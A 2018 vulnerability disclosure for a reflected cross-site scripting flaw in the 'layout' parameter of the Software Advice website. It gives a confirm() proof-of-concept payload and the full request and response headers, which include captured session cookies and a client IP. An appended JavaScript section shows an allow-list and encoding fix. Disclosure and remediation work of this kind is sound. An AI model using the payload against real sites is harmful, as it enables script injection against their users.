Software Advice 1.0 Cross Site Scripting

Posted May 28, 2018
Authored by Ismail Tasdelen

Software Advice version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 7bc406a8580de28cdfb85b1124b94292bb3c70c3821030fa776315ab32a88bfb

# Exploit Title: [ Reflected XSS at Software Advice ]

# Date: [27.05.2018]

# Exploit Author: [Ismail Tasdelen]

# Vendor Homepage: [https://www.softwareadvice.com/]

# Software Link: [ Software Advice Website ]

# Version: 1.0

# Tested on: Kali Linux

# Reflected XSS Payload : '-confirm`Ismail Tasdelen`-'

# HTTP REQUEST HEADER :

Request URL: https://www.softwareadvice.com/hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27
Request Method: GET
Status Code: 200
Remote Address: 23.221.165.35:443
Referrer Policy: no-referrer-when-downgrade
:authority: www.softwareadvice.com
:method: GET
:path: /hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27
:scheme: https
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
accept-encoding: gzip, deflate, br
accept-language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
cache-control: max-age=0
cookie: PHPSESSID=84ghfoei5qehtisf94lk187es6; optimizelyEndUserId=oeu1527439807853r0.3055516258919597; _ga=GA1.2.53898763.1527439811; _gid=GA1.2.242573448.1527439811; hasSeenCookiesConsent=1; __utma=24246072.53898763.1527439811.1527439812.1527439812.1; __utmc=24246072; __utmz=24246072.1527439812.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IR_gbd=softwareadvice.com; IR_PI=1527439811848.llloh2aehwq; lc_sso7520261=1527439812306; _gu=fc0f39ef-3375-48f4-8a23-f2bc31885a3a; __lc.visitor_id.7520261=S1527439814.38416b2f19; _gs=2.s(src=https://www.softwareadvice.com/hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27)c[Desktop,Chrome,25:347:7992:,Windows,212.253.204.84]; __utmb=24246072.8.10.1527439812; _uetsid=_uetabcf556c; IR_8018=1527440320552%7C0%7C1527439811848; _gw=2.u[~0,~0,~0,~0,~0]v[~f5n0a,~8,~0]a()
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# HTTP RESPONSE HEADER :

accept-ranges: bytes
browser-cache: none
cache-control: max-age=0, no-cache, no-store
cache-type: default
content-encoding: gzip
content-length: 38319
content-type: text/html; charset=UTF-8
date: Sun, 27 May 2018 17:00:18 GMT
expires: Sun, 27 May 2018 17:00:18 GMT
front-end-https: on
hosted: web24
p3p: CP="CAO PSA OUR"
pragma: no-cache
server: nginx
status: 200
strict-transport-security: max-age=31536000
vary: Accept-Encoding
x-varnish: 10849666
x-varnish-cache: pass
x-varnish-ttl: 0

# Query String Parameters :

layout: '-confirm`Ismail Tasdelen`-'

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
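
The payload's shape (closing quote, tagged-template call, reopening quote) suggests the `layout` value is echoed inside a single-quoted JavaScript string; the advisory does not show the response body, so that sink is an assumption. The added example below, which is not code from the advisory or the vendor, contrasts that pattern with an allow-list plus context-aware encoding. `ALLOWED_LAYOUTS` and all function names are hypothetical.

```javascript
// Added example; not code from the advisory, its author, or the vendor.
// Assumption: `layout` is echoed into a single-quoted string in an inline <script>.

// Constructed sample input: the payload string quoted in the advisory.
const SAMPLE = "'-confirm`Ismail Tasdelen`-'";

// Vulnerable pattern: raw concatenation into a JavaScript string literal.
function renderVulnerable(layout) {
  return "<script>var layout = '" + layout + "';</script>";
}

// Hypothetical allow-list of the layout names the page really supports.
const ALLOWED_LAYOUTS = new Set(["default", "compact", "print"]);

// Mitigation 1: accept only known values, otherwise fall back to a default.
function normalizeLayout(layout) {
  return ALLOWED_LAYOUTS.has(layout) ? layout : "default";
}

// Mitigation 2: encode for the script context. JSON.stringify escapes double
// quotes, backslashes and control characters; the replacements stop the value
// from closing the <script> element or opening an HTML comment or entity.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026");
}

function renderHardened(layout) {
  return "<script>var layout = " + jsStringLiteral(normalizeLayout(layout)) + ";</script>";
}

// Regression check: run the script body with a stubbed confirm() and report
// whether the reflected value caused a call instead of staying inert data.
function callsConfirm(html) {
  const body = html.replace(/^<script>/, "").replace(/<\/script>$/, "");
  let called = false;
  new Function("confirm", body)(() => { called = true; });
  return called;
}

console.log("vulnerable template calls confirm:", callsConfirm(renderVulnerable(SAMPLE)));
console.log("hardened template calls confirm:  ", callsConfirm(renderHardened(SAMPLE)));
console.log("encoding alone:", "<script>var layout = " + jsStringLiteral(SAMPLE) + ";</script>");
```

Either mitigation alone keeps the value inert here; the allow-list is the stronger control because a layout selector never needs free-form input.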